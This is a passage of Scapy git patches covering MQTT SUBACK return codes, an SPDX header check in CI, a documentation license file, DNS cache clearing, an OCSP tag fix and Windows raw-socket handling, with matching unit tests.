MQTTSubscribe(Packet): ALLOWED_RETURN_CODE = { - 0: 'Success', - 1: 'Success', - 2: 'Success', - 128: 'Failure' + 0x00: 'Granted QoS 0', + 0x01: 'Granted QoS 1', + 0x02: 'Granted QoS 2', + 0x80: 'Unspecified error', + 0x83: 'Implementation specific error', + 0x87: 'Not authorized', + 0x8F: 'Topic Filter invalid', + 0x91: 'Packet Identifier in use', + 0x97: 'Quota exceeded', + 0x9E: 'Shared Subscriptions not supported', + 0xA1: 'Subscription Identifiers not supported', + 0xA2: 'Wildcard Subscriptions not supported', } @@ -261,7 +278,7 @@ class MQTTSuback(Packet): name = "MQTT suback" fields_desc = [ ShortField("msgid", None), - ByteEnumField("retcode", None, ALLOWED_RETURN_CODE) + FieldListField("retcodes", None, ByteEnumField("", None, ALLOWED_RETURN_CODE)) ] diff --git a/test/contrib/mqtt.uts b/test/contrib/mqtt.uts index a255b9e3aeb..ad444a05104 100644 --- a/test/contrib/mqtt.uts +++ b/test/contrib/mqtt.uts @@ -112,16 +112,21 @@ assert subscribe.topics[0].QOS == 1 = MQTTSuback, packet instantiation -sk = MQTT()/MQTTSuback(msgid=1, retcode=0) +sk = MQTT()/MQTTSuback(msgid=1, retcodes=[0]) assert sk.type == 9 assert sk.msgid == 1 -assert sk.retcode == 0 +assert sk.retcodes == [0] = MQTTSuback, packet dissection s = b'\x90\x03\x00\x01\x00' suback = MQTT(s) assert suback.msgid == 1 -assert suback.retcode == 0 +assert suback.retcodes == [0] + +s = b'\x90\x03\x00\x01\x00\x01' +suback = MQTT(s) +assert suback.msgid == 1 +assert suback.retcodes == [0, 1] = MQTTUnsubscribe, packet instantiation unsb = MQTT()/MQTTUnsubscribe(msgid=1, topics=[MQTTTopic(topic='newtopic',length=0)]) @@ -181,4 +186,4 @@ assert MQTTUnsubscribe in u and len(u.topics) == 2 and u.topics[1].topic == b"c/ = MQTTSubscribe u = MQTT(b'\x82\x10\x00\x01\x00\x03\x61\x2F\x62\x02\x00\x03\x63\x2F\x64\x00') -assert MQTTSubscribe in u and len(u.topics) == 2 and u.topics[1].topic == b"c/d" \ No newline at end of file +assert MQTTSubscribe in u and len(u.topics) == 2 and u.topics[1].topic == b"c/d" From 6829f4c97d1ad9587b96bc4af551fcaf6735724e Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sat, 10 Feb 2024 19:15:42 +0100 Subject: [PATCH 1199/1632] Update check_spdx.sh to return 1 on failure (#4277) --- scapy/tools/check_spdx.sh | 16 ++++++++++++++-- 1 file changed, 14 insertions(+), 2 deletions(-) diff --git a/scapy/tools/check_spdx.sh b/scapy/tools/check_spdx.sh index 1df1a1471e1..890619c1172 100644 --- a/scapy/tools/check_spdx.sh +++ b/scapy/tools/check_spdx.sh @@ -9,11 +9,23 @@ SCRIPT_DIR=$( cd -- "$( dirname -- "${BASH_SOURCE[0]}" )" &> /dev/null && pwd ) ROOT_DIR=$SCRIPT_DIR/../.. +# http://mywiki.wooledge.org/BashFAQ/024 +# This documents an absolutely WTF behavior of bash. +set +m +shopt -s lastpipe + function check_path() { cd $ROOT_DIR + RCODE=0 for ext in "${@:2}"; do - find $1 -name "*.$ext" -exec bash -c '[[ -z $(grep "SPDX" {}) ]] && echo "{}"' \; + find $1 -name "*.$ext" | while read f; do + if [[ -z $(grep "SPDX" $f) ]]; then + echo "$f" + RCODE=1 + fi + done done + return $RCODE } -check_path scapy py +check_path scapy py || exit $? From 6565a75c77d2671a376a8f9c778224b9fb540f83 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Sun, 11 Feb 2024 12:46:43 +0100 Subject: [PATCH 1200/1632] Automatically check SPDX identifiers (#4268) --- .github/workflows/unittests.yml | 8 ++++++++ scapy/tools/check_spdx.sh | 0 2 files changed, 8 insertions(+) mode change 100644 => 100755 scapy/tools/check_spdx.sh diff --git a/.github/workflows/unittests.yml b/.github/workflows/unittests.yml index 925189ec11d..b120477dfed 100644 --- a/.github/workflows/unittests.yml +++ b/.github/workflows/unittests.yml @@ -46,6 +46,14 @@ jobs: run: pip install tox - name: Build docs run: tox -e docs + spdx: + name: Check SPDX identifiers + runs-on: ubuntu-latest + steps: + - name: Checkout Scapy + uses: actions/checkout@v4 + - name: Launch script + run: bash scapy/tools/check_spdx.sh mypy: name: Type hints check runs-on: ubuntu-latest diff --git a/scapy/tools/check_spdx.sh b/scapy/tools/check_spdx.sh old mode 100644 new mode 100755 From 507311023d76618e4f9254e67dac501d3f9bf190 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 11 Feb 2024 14:51:37 +0100 Subject: [PATCH 1201/1632] Clarify that the DOC is under CC BY-NC-SA 2.5 (#4254) --- .config/codespell_ignore.txt | 2 ++ README.md | 5 ++++ doc/LICENSE | 55 ++++++++++++++++++++++++++++++++++++ doc/scapy/index.rst | 2 +- 4 files changed, 63 insertions(+), 1 deletion(-) create mode 100644 doc/LICENSE diff --git a/.config/codespell_ignore.txt b/.config/codespell_ignore.txt index ecb75fe7cdc..a057b8e5b26 100644 --- a/.config/codespell_ignore.txt +++ b/.config/codespell_ignore.txt @@ -23,6 +23,7 @@ iff implementors inout interaktive +merchantibility microsof mitre nd @@ -36,6 +37,7 @@ ro ser singl slac +synching te temporaere tim diff --git a/README.md b/README.md index 63aeb589c02..0da1b8ff279 100644 --- a/README.md +++ b/README.md @@ -91,6 +91,11 @@ follow the instructions to install them. +## License + +Scapy's code, tests and tools are licensed under GPL v2. +The documentation (everything unless marked otherwise in `doc/`, and except the logo) is licensed under CC BY-NC-SA 2.5. + ## Contributing Want to contribute? Great! Please take a few minutes to diff --git a/doc/LICENSE b/doc/LICENSE new file mode 100644 index 00000000000..d560622633d --- /dev/null +++ b/doc/LICENSE @@ -0,0 +1,55 @@ +Creative Commons Attribution-NonCommercial-ShareAlike 2.5 + +CREATIVE COMMONS CORPORATION IS NOT A LAW FIRM AND DOES NOT PROVIDE LEGAL SERVICES. DISTRIBUTION OF THIS LICENSE DOES NOT CREATE AN ATTORNEY-CLIENT RELATIONSHIP. CREATIVE COMMONS PROVIDES THIS INFORMATION ON AN "AS-IS" BASIS. CREATIVE COMMONS MAKES NO WARRANTIES REGARDING THE INFORMATION PROVIDED, AND DISCLAIMS LIABILITY FOR DAMAGES RESULTING FROM ITS USE. + +License + +THE WORK (AS DEFINED BELOW) IS PROVIDED UNDER THE TERMS OF THIS CREATIVE COMMONS PUBLIC LICENSE ("CCPL" OR "LICENSE"). THE WORK IS PROTECTED BY COPYRIGHT AND/OR OTHER APPLICABLE LAW. ANY USE OF THE WORK OTHER THAN AS AUTHORIZED UNDER THIS LICENSE OR COPYRIGHT LAW IS PROHIBITED. + +BY EXERCISING ANY RIGHTS TO THE WORK PROVIDED HERE, YOU ACCEPT AND AGREE TO BE BOUND BY THE TERMS OF THIS LICENSE. THE LICENSOR GRANTS YOU THE RIGHTS CONTAINED HERE IN CONSIDERATION OF YOUR ACCEPTANCE OF SUCH TERMS AND CONDITIONS. + + 1. Definitions + a. "Collective Work" means a work, such as a periodical issue, anthology or encyclopedia, in which the Work in its entirety in unmodified form, along with a number of other contributions, constituting separate and independent works in themselves, are assembled into a collective whole. A work that constitutes a Collective Work will not be considered a Derivative Work (as defined below) for the purposes of this License. + b. "Derivative Work" means a work based upon the Work or upon the Work and other pre-existing works, such as a translation, musical arrangement, dramatization, fictionalization, motion picture version, sound recording, art reproduction, abridgment, condensation, or any other form in which the Work may be recast, transformed, or adapted, except that a work that constitutes a Collective Work will not be considered a Derivative Work for the purpose of this License. For the avoidance of doubt, where the Work is a musical composition or sound recording, the synchronization of the Work in timed-relation with a moving image ("synching") will be considered a Derivative Work for the purpose of this License. + c. "Licensor" means the individual or entity that offers the Work under the terms of this License. + d. "Original Author" means the individual or entity who created the Work. + e. "Work" means the copyrightable work of authorship offered under the terms of this License. + f. "You" means an individual or entity exercising rights under this License who has not previously violated the terms of this License with respect to the Work, or who has received express permission from the Licensor to exercise rights under this License despite a previous violation. + g. "License Elements" means the following high-level license attributes as selected by Licensor and indicated in the title of this License: Attribution, Noncommercial, ShareAlike. + 2. Fair Use Rights. Nothing in this license is intended to reduce, limit, or restrict any rights arising from fair use, first sale or other limitations on the exclusive rights of the copyright owner under copyright law or other applicable laws. + 3. License Grant. Subject to the terms and conditions of this License, Licensor hereby grants You a worldwide, royalty-free, non-exclusive, perpetual (for the duration of the applicable copyright) license to exercise the rights in the Work as stated below: + a. to reproduce the Work, to incorporate the Work into one or more Collective Works, and to reproduce the Work as incorporated in the Collective Works; + b. to create and reproduce Derivative Works; + c. to distribute copies or phonorecords of, display publicly, perform publicly, and perform publicly by means of a digital audio transmission the Work including as incorporated in Collective Works; + d. to distribute copies or phonorecords of, display publicly, perform publicly, and perform publicly by means of a digital audio transmission Derivative Works; + + The above rights may be exercised in all media and formats whether now known or hereafter devised. The above rights include the right to make such modifications as are technically necessary to exercise the rights in other media and formats. All rights not expressly granted by Licensor are hereby reserved, including but not limited to the rights set forth in Sections 4(e) and 4(f). + 4. Restrictions. The license granted in Section 3 above is expressly made subject to and limited by the following restrictions: + a. You may distribute, publicly display, publicly perform, or publicly digitally perform the Work only under the terms of this License, and You must include a copy of, or the Uniform Resource Identifier for, this License with every copy or phonorecord of the Work You distribute, publicly display, publicly perform, or publicly digitally perform. You may not offer or impose any terms on the Work that alter or restrict the terms of this License or the recipients' exercise of the rights granted hereunder. You may not sublicense the Work. You must keep intact all notices that refer to this License and to the disclaimer of warranties. You may not distribute, publicly display, publicly perform, or publicly digitally perform the Work with any technological measures that control access or use of the Work in a manner inconsistent with the terms of this License Agreement. The above applies to the Work as incorporated in a Collective Work, but this does not require the Collective Work apart from the Work itself to be made subject to the terms of this License. If You create a Collective Work, upon notice from any Licensor You must, to the extent practicable, remove from the Collective Work any credit as required by clause 4(d), as requested. If You create a Derivative Work, upon notice from any Licensor You must, to the extent practicable, remove from the Derivative Work any credit as required by clause 4(d), as requested. + b. You may distribute, publicly display, publicly perform, or publicly digitally perform a Derivative Work only under the terms of this License, a later version of this License with the same License Elements as this License, or a Creative Commons iCommons license that contains the same License Elements as this License (e.g. Attribution-NonCommercial-ShareAlike 2.5 Japan). You must include a copy of, or the Uniform Resource Identifier for, this License or other license specified in the previous sentence with every copy or phonorecord of each Derivative Work You distribute, publicly display, publicly perform, or publicly digitally perform. You may not offer or impose any terms on the Derivative Works that alter or restrict the terms of this License or the recipients' exercise of the rights granted hereunder, and You must keep intact all notices that refer to this License and to the disclaimer of warranties. You may not distribute, publicly display, publicly perform, or publicly digitally perform the Derivative Work with any technological measures that control access or use of the Work in a manner inconsistent with the terms of this License Agreement. The above applies to the Derivative Work as incorporated in a Collective Work, but this does not require the Collective Work apart from the Derivative Work itself to be made subject to the terms of this License. + c. You may not exercise any of the rights granted to You in Section 3 above in any manner that is primarily intended for or directed toward commercial advantage or private monetary compensation. The exchange of the Work for other copyrighted works by means of digital file-sharing or otherwise shall not be considered to be intended for or directed toward commercial advantage or private monetary compensation, provided there is no payment of any monetary compensation in connection with the exchange of copyrighted works. + d. If you distribute, publicly display, publicly perform, or publicly digitally perform the Work or any Derivative Works or Collective Works, You must keep intact all copyright notices for the Work and provide, reasonable to the medium or means You are utilizing: (i) the name of the Original Author (or pseudonym, if applicable) if supplied, and/or (ii) if the Original Author and/or Licensor designate another party or parties (e.g. a sponsor institute, publishing entity, journal) for attribution in Licensor's copyright notice, terms of service or by other reasonable means, the name of such party or parties; the title of the Work if supplied; to the extent reasonably practicable, the Uniform Resource Identifier, if any, that Licensor specifies to be associated with the Work, unless such URI does not refer to the copyright notice or licensing information for the Work; and in the case of a Derivative Work, a credit identifying the use of the Work in the Derivative Work (e.g., "French translation of the Work by Original Author," or "Screenplay based on original Work by Original Author"). Such credit may be implemented in any reasonable manner; provided, however, that in the case of a Derivative Work or Collective Work, at a minimum such credit will appear where any other comparable authorship credit appears and in a manner at least as prominent as such other comparable authorship credit. + e. For the avoidance of doubt, where the Work is a musical composition: + i. Performance Royalties Under Blanket Licenses. Licensor reserves the exclusive right to collect, whether individually or via a performance rights society (e.g. ASCAP, BMI, SESAC), royalties for the public performance or public digital performance (e.g. webcast) of the Work if that performance is primarily intended for or directed toward commercial advantage or private monetary compensation. + ii. Mechanical Rights and Statutory Royalties. Licensor reserves the exclusive right to collect, whether individually or via a music rights agency or designated agent (e.g. Harry Fox Agency), royalties for any phonorecord You create from the Work ("cover version") and distribute, subject to the compulsory license created by 17 USC Section 115 of the US Copyright Act (or the equivalent in other jurisdictions), if Your distribution of such cover version is primarily intended for or directed toward commercial advantage or private monetary compensation. + f. Webcasting Rights and Statutory Royalties. For the avoidance of doubt, where the Work is a sound recording, Licensor reserves the exclusive right to collect, whether individually or via a performance-rights society (e.g. SoundExchange), royalties for the public digital performance (e.g. webcast) of the Work, subject to the compulsory license created by 17 USC Section 114 of the US Copyright Act (or the equivalent in other jurisdictions), if Your public digital performance is primarily intended for or directed toward commercial advantage or private monetary compensation. + 5. Representations, Warranties and Disclaimer + + UNLESS OTHERWISE MUTUALLY AGREED TO BY THE PARTIES IN WRITING, LICENSOR OFFERS THE WORK AS-IS AND MAKES NO REPRESENTATIONS OR WARRANTIES OF ANY KIND CONCERNING THE WORK, EXPRESS, IMPLIED, STATUTORY OR OTHERWISE, INCLUDING, WITHOUT LIMITATION, WARRANTIES OF TITLE, MERCHANTIBILITY, FITNESS FOR A PARTICULAR PURPOSE, NONINFRINGEMENT, OR THE ABSENCE OF LATENT OR OTHER DEFECTS, ACCURACY, OR THE PRESENCE OF ABSENCE OF ERRORS, WHETHER OR NOT DISCOVERABLE. SOME JURISDICTIONS DO NOT ALLOW THE EXCLUSION OF IMPLIED WARRANTIES, SO SUCH EXCLUSION MAY NOT APPLY TO YOU. + 6. Limitation on Liability. EXCEPT TO THE EXTENT REQUIRED BY APPLICABLE LAW, IN NO EVENT WILL LICENSOR BE LIABLE TO YOU ON ANY LEGAL THEORY FOR ANY SPECIAL, INCIDENTAL, CONSEQUENTIAL, PUNITIVE OR EXEMPLARY DAMAGES ARISING OUT OF THIS LICENSE OR THE USE OF THE WORK, EVEN IF LICENSOR HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. + 7. Termination + a. This License and the rights granted hereunder will terminate automatically upon any breach by You of the terms of this License. Individuals or entities who have received Derivative Works or Collective Works from You under this License, however, will not have their licenses terminated provided such individuals or entities remain in full compliance with those licenses. Sections 1, 2, 5, 6, 7, and 8 will survive any termination of this License. + b. Subject to the above terms and conditions, the license granted here is perpetual (for the duration of the applicable copyright in the Work). Notwithstanding the above, Licensor reserves the right to release the Work under different license terms or to stop distributing the Work at any time; provided, however that any such election will not serve to withdraw this License (or any other license that has been, or is required to be, granted under the terms of this License), and this License will continue in full force and effect unless terminated as stated above. + 8. Miscellaneous + a. Each time You distribute or publicly digitally perform the Work or a Collective Work, the Licensor offers to the recipient a license to the Work on the same terms and conditions as the license granted to You under this License. + b. Each time You distribute or publicly digitally perform a Derivative Work, Licensor offers to the recipient a license to the original Work on the same terms and conditions as the license granted to You under this License. + c. If any provision of this License is invalid or unenforceable under applicable law, it shall not affect the validity or enforceability of the remainder of the terms of this License, and without further action by the parties to this agreement, such provision shall be reformed to the minimum extent necessary to make such provision valid and enforceable. + d. No term or provision of this License shall be deemed waived and no breach consented to unless such waiver or consent shall be in writing and signed by the party to be charged with such waiver or consent. + e. This License constitutes the entire agreement between the parties with respect to the Work licensed here. There are no understandings, agreements or representations with respect to the Work not specified here. Licensor shall not be bound by any additional provisions that may appear in any communication from You. This License may not be modified without the mutual written agreement of the Licensor and You. + +Creative Commons is not a party to this License, and makes no warranty whatsoever in connection with the Work. Creative Commons will not be liable to You or any party on any legal theory for any damages whatsoever, including without limitation any general, special, incidental or consequential damages arising in connection to this license. Notwithstanding the foregoing two (2) sentences, if Creative Commons has expressly identified itself as the Licensor hereunder, it shall have all rights and obligations of Licensor. + +Except for the limited purpose of indicating to the public that the Work is licensed under the CCPL, neither party will use the trademark "Creative Commons" or any related trademark or logo of Creative Commons without the prior written consent of Creative Commons. Any permitted use will be in compliance with Creative Commons' then-current trademark usage guidelines, as may be published on its website or otherwise made available upon request from time to time. + +Creative Commons may be contacted at http://creativecommons.org/. + diff --git a/doc/scapy/index.rst b/doc/scapy/index.rst index 6999c73acd7..3fceb6ca558 100644 --- a/doc/scapy/index.rst +++ b/doc/scapy/index.rst @@ -13,7 +13,7 @@ Welcome to Scapy's documentation! :Release: |release| :Date: |today| -This document is under a `Creative Commons Attribution - Non-Commercial +Scapy's documentation is under a `Creative Commons Attribution - Non-Commercial - Share Alike 2.5 `_ license. .. toctree:: From bb36cecd1f24fff7a02483c8e981e2897cc06ea1 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 11 Feb 2024 14:52:07 +0100 Subject: [PATCH 1202/1632] BT: cleanup libc loading (#4278) --- scapy/layers/bluetooth.py | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/scapy/layers/bluetooth.py b/scapy/layers/bluetooth.py index 4b164d5853c..36591ed2c58 100644 --- a/scapy/layers/bluetooth.py +++ b/scapy/layers/bluetooth.py @@ -2533,8 +2533,8 @@ def __init__(self, socket_domain, socket_type, socket_protocol, sock_address): # the correct parameters. We must call libc functions directly via # ctypes. sockaddr_hcip = ctypes.POINTER(sockaddr_hci) - ctypes.cdll.LoadLibrary("libc.so.6") - libc = ctypes.CDLL("libc.so.6") + from ctypes.util import find_library + libc = ctypes.cdll.LoadLibrary(find_library("c")) socket_c = libc.socket socket_c.argtypes = (ctypes.c_int, ctypes.c_int, ctypes.c_int) @@ -2575,8 +2575,8 @@ def close(self): return # Properly close socket so we can free the device - ctypes.cdll.LoadLibrary("libc.so.6") - libc = ctypes.CDLL("libc.so.6") + from ctypes.util import find_library + libc = ctypes.cdll.LoadLibrary(find_library("c")) close = libc.close close.restype = ctypes.c_int From d6124544022c17a84c3110e4fbef64491d880ee0 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Wed, 31 Jan 2024 11:43:41 +0100 Subject: [PATCH 1203/1632] Auto clear DNS cache on set --- scapy/layers/dns.py | 7 +++++++ test/scapy/layers/dns.uts | 9 +++++++++ 2 files changed, 16 insertions(+) diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index 3e27ea32b73..acc6c88f44c 100644 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -325,6 +325,13 @@ class DNSStrField(StrLenField): """ def h2i(self, pkt, x): + # Setting a DNSStrField manually (h2i) means any current compression will break + if ( + pkt and + isinstance(pkt.parent, DNSCompressedPacket) and + pkt.parent.raw_packet_cache + ): + pkt.parent.clear_cache() if not x: return b"." x = bytes_encode(x) diff --git a/test/scapy/layers/dns.uts b/test/scapy/layers/dns.uts index 88bd87c1021..8d2bc6958f2 100644 --- a/test/scapy/layers/dns.uts +++ b/test/scapy/layers/dns.uts @@ -164,6 +164,15 @@ recompressed.an[3].rdlen = None assert raw(recompressed) == raw(pkt) += DNS cache clearance on sub change +~ dns + +# GH4216 +p = DNS(b'\x00\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x03H-1\x05local\x00\x00\x05\x00\x01\x00\x00\x00\x00\x00\x06\x03H-2\xc0\x10\xc0!\x00\x05\x00\x01\x00\x00\x00\x00\x00\x02\xc0\x0c') +p[DNS].an[0].rrname = 'H' +assert p.raw_packet_cache is None +assert bytes(p) == b'\x00\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x01H\x00\x00\x05\x00\x01\x00\x00\x00\x00\x00\x0b\x03H-2\x05local\x00\x03H-2\x05local\x00\x00\x05\x00\x01\x00\x00\x00\x00\x00\x0b\x03H-1\x05local\x00' + = DNS frames with MX records ~ dns From 0708e6743cb4ef119c74725bb99047edfb66f66d Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Wed, 31 Jan 2024 11:16:56 +0100 Subject: [PATCH 1204/1632] Fix OCSP_RevokedInfo --- scapy/layers/x509.py | 2 +- test/scapy/layers/x509.uts | 7 +++++++ 2 files changed, 8 insertions(+), 1 deletion(-) diff --git a/scapy/layers/x509.py b/scapy/layers/x509.py index bae8ad49356..ca3eb5a6189 100644 --- a/scapy/layers/x509.py +++ b/scapy/layers/x509.py @@ -1102,7 +1102,7 @@ class OCSP_RevokedInfo(ASN1_Packet): ASN1F_optional( ASN1F_PACKET("revocationReason", None, X509_ExtReasonCode, - explicit_tag=0x80))) + explicit_tag=0xa0))) class OCSP_UnknownInfo(ASN1_Packet): diff --git a/test/scapy/layers/x509.uts b/test/scapy/layers/x509.uts index e6334faf62f..4fa958040b8 100644 --- a/test/scapy/layers/x509.uts +++ b/test/scapy/layers/x509.uts @@ -257,6 +257,13 @@ assert responseData.producedAt == ASN1_GENERALIZED_TIME("20160914121000Z") assert len(responseData.responses) == 1 responseData.responseExtensions is None += OCSP class : OCSP ResponseData dissection with RecokedInfo +from scapy.layers.x509 import OCSP_ResponseData +pkt = OCSP_ResponseData(b"0\x81\xdf\xa2\x16\x04\x14\x11\x7f\x8eD\xbb\xe9\x7f\xca'\xfeG\x90\x89\\\x18\xea\x0e\xa5#W\x18\x0f20240121133708Z0\x81\x8e0\x81\x8b0M0\t\x06\x05+\x0e\x03\x02\x1a\x05\x00\x04\x14\x0b\xaf\xcc#$\xb8\xb0\xf8\xb02,\x9aPn9VSW\x14\x14\x04\x14\x11\x7f\x8eD\xbb\xe9\x7f\xca'\xfeG\x90\x89\\\x18\xea\x0e\xa5#W\x02\x14\x10&\x99j\t\xaa\xb9>\xde\x06\xb6#b\xa9\xe4GA\x07\x1b2\xa1\x16\x18\x0f20240120133708Z\xa0\x03\n\x01\x01\x18\x0f20240121133708Z\xa0\x11\x18\x0f20240122133708Z\xa1#0!0\x1f\x06\t+\x06\x01\x05\x05\x070\x01\x02\x04\x12\x04\x10\xfc\xb6\x92\xdf^\xf3\x03{\tH}\x12\x9f\xaa\x13^") +assert pkt.responderID.responderID.byKey == b"\x11\x7f\x8eD\xbb\xe9\x7f\xca'\xfeG\x90\x89\\\x18\xea\x0e\xa5#W" +assert pkt.responses[0].certID.issuerNameHash == b'\x0b\xaf\xcc#$\xb8\xb0\xf8\xb02,\x9aPn9VSW\x14\x14' +assert pkt.responses[0].certStatus.certStatus.revocationReason.cRLReason == 0x1 + = OCSP class : OCSP SingleResponse checks from scapy.layers.x509 import OCSP_GoodInfo singleResponse = responseData.responses[0] From cb7134ccf45080811ca839e7c0ea98c4330a2502 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Fri, 16 Feb 2024 21:57:44 +0100 Subject: [PATCH 1205/1632] Minor windows bug fixes (#4255) * Minor windows bug fixes * The libpcap warning should be log_loading * Restore non-libpcap support on Windows --- scapy/arch/windows/__init__.py | 36 +++++++++++-- scapy/arch/windows/native.py | 92 +++++++++++++++++++++++----------- scapy/config.py | 2 +- scapy/sendrecv.py | 2 +- 4 files changed, 95 insertions(+), 37 deletions(-) diff --git a/scapy/arch/windows/__init__.py b/scapy/arch/windows/__init__.py index 198fcee257f..f432a231eb4 100755 --- a/scapy/arch/windows/__init__.py +++ b/scapy/arch/windows/__init__.py @@ -46,9 +46,11 @@ from typing import ( Any, Dict, + Iterator, List, Optional, Tuple, + Type, Union, cast, overload, @@ -621,11 +623,24 @@ def load(self, NetworkInterface_Win=NetworkInterface_Win): i['guid'] = NPCAP_LOOPBACK_NAME windows_interfaces[i['guid']] = i + def iterinterfaces() -> Iterator[ + Tuple[str, Optional[str], List[str], int, str, Optional[Dict[str, Any]]] + ]: + if conf.use_pcap: + # We have a libpcap provider: enrich pcap interfaces with + # Windows data + for netw, if_data in conf.cache_pcapiflist.items(): + name, ips, flags, _ = if_data + guid = _pcapname_to_guid(netw) + data = windows_interfaces.get(guid, None) + yield netw, name, ips, flags, guid, data + else: + # We don't have a libpcap provider: only use Windows data + for guid, data in windows_interfaces.items(): + yield guid, None, [], 0, guid, data + index = 0 - for netw, if_data in conf.cache_pcapiflist.items(): - name, ips, flags, _ = if_data - guid = _pcapname_to_guid(netw) - data = windows_interfaces.get(guid, None) + for netw, name, ips, flags, guid, data in iterinterfaces(): if data: # Exists in Windows registry data['network_name'] = netw @@ -661,6 +676,14 @@ def reload(self): load_winpcapy() return self.load() + def _l3socket(self, dev, ipv6): + # type: (NetworkInterface, bool) -> Type[SuperSocket] + """Return L3 socket used by interfaces of this provider""" + if ipv6: + return conf.L3socket6 + else: + return conf.L3socket + # Register provider conf.ifaces.register_provider(WindowsInterfacesProvider) @@ -1032,4 +1055,7 @@ def read_nameservers() -> List[str]: """ # Windows has support for different DNS servers on each network interface, # but to be cross-platform we only return the servers for the default one. - return cast(NetworkInterface_Win, conf.iface).nameservers + if isinstance(conf.iface, NetworkInterface_Win): + return conf.iface.nameservers + else: + return [] diff --git a/scapy/arch/windows/native.py b/scapy/arch/windows/native.py index 075074fc4eb..1e87b6556f2 100644 --- a/scapy/arch/windows/native.py +++ b/scapy/arch/windows/native.py @@ -52,7 +52,7 @@ from scapy.compat import raw from scapy.config import conf from scapy.data import MTU -from scapy.error import Scapy_Exception, warning +from scapy.error import Scapy_Exception, log_runtime from scapy.packet import Packet from scapy.interfaces import resolve_iface, _GlobInterfaceType from scapy.supersocket import SuperSocket @@ -77,7 +77,7 @@ class L3WinSocket(SuperSocket): def __init__(self, iface=None, # type: Optional[_GlobInterfaceType] - proto=socket.IPPROTO_IP, # type: int + proto=None, # type: Optional[int] ttl=128, # type: int ipv6=False, # type: bool promisc=True, # type: bool @@ -87,20 +87,34 @@ def __init__(self, from scapy.layers.inet import IP from scapy.layers.inet6 import IPv6 for kwarg in kwargs: - warning("Dropping unsupported option: %s" % kwarg) + log_runtime.warning("Dropping unsupported option: %s" % kwarg) self.iface = iface and resolve_iface(iface) or conf.iface af = socket.AF_INET6 if ipv6 else socket.AF_INET - self.proto = proto - if ipv6: - from scapy.arch import get_if_addr6 - self.host_ip6 = get_if_addr6(conf.iface) or "::1" - if proto == socket.IPPROTO_IP: - # We'll restrict ourselves to UDP, as TCP isn't bindable - # on AF_INET6 - self.proto = socket.IPPROTO_UDP - # On Windows, with promisc=False, you won't get much self.ipv6 = ipv6 + # Proto and cls + if proto is None: + if self.ipv6: + # On IPv6, the header isn't returned with recvfrom(). + # We don't want to guess if it's TCP, UDP or SCTP.. so ask for proto + # (This would be fixable if Python supported recvmsg() on Windows) + log_runtime.warning( + "Due to restrictions, 'proto' must be provided when " + "opening raw IPv6 sockets. Defaulting to socket.IPPROTO_UDP" + ) + self.proto = socket.IPPROTO_UDP + else: + self.proto = socket.IPPROTO_IP + elif self.ipv6 and proto == socket.IPPROTO_TCP: + # Ah, sadly this isn't supported either. + log_runtime.warning( + "Be careful, socket.IPPROTO_TCP doesn't work in raw sockets on " + "Windows, so this is equivalent to socket.IPPROTO_IP." + ) + self.proto = socket.IPPROTO_IP + else: + self.proto = proto self.cls = IPv6 if ipv6 else IP + # Promisc if promisc is None: promisc = conf.sniff_promisc self.promisc = promisc @@ -111,34 +125,30 @@ def __init__(self, # However, using IPPROTO_IP with AF_INET6 will still receive # the IPv6 packets try: + # Listening on AF_INET6 IPPROTO_IPV6 is broken. Use IPPROTO_IP self.ins = socket.socket(af, socket.SOCK_RAW, - self.proto) + socket.IPPROTO_IP) self.outs = socket.socket(af, socket.SOCK_RAW, socket.IPPROTO_RAW) except OSError as e: - if e.errno == 10013: + if e.errno == 13: raise OSError("Windows native L3 Raw sockets are only " "usable as administrator ! " - "Install Winpcap/Npcap to workaround !") + "Please install Npcap to workaround !") raise self.ins.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) self.outs.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) self.ins.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 2**30) self.outs.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 2**30) - # IOCTL Include IP headers - self.ins.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) - self.outs.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) # set TTL self.ins.setsockopt(socket.IPPROTO_IP, socket.IP_TTL, ttl) self.outs.setsockopt(socket.IPPROTO_IP, socket.IP_TTL, ttl) - # Bind on all ports - host = self.iface.ip if self.iface.ip else socket.gethostname() - self.ins.bind((host, 0)) - self.ins.setblocking(False) # Get as much data as possible: reduce what is cropped if ipv6: + # IPV6_HDRINCL is broken. Use IP_HDRINCL even on IPv6 + self.outs.setsockopt(socket.IPPROTO_IPV6, socket.IP_HDRINCL, 1) try: # Not all Windows versions self.ins.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_RECVTCLASS, 1) @@ -147,6 +157,9 @@ def __init__(self, except (OSError, socket.error): pass else: + # IOCTL Include IP headers + self.ins.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) + self.outs.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) try: # Not Windows XP self.ins.setsockopt(socket.IPPROTO_IP, socket.IP_RECVDSTADDR, 1) @@ -160,6 +173,16 @@ def __init__(self, ) except (OSError, socket.error): pass + # Bind on all ports + if ipv6: + from scapy.arch import get_if_addr6 + host = get_if_addr6(self.iface) + else: + from scapy.arch import get_if_addr + host = get_if_addr(self.iface) + self.ins.bind((host or socket.gethostname(), 0)) + # self.ins.setblocking(False) + # Set promisc if promisc: # IOCTL Receive all packets 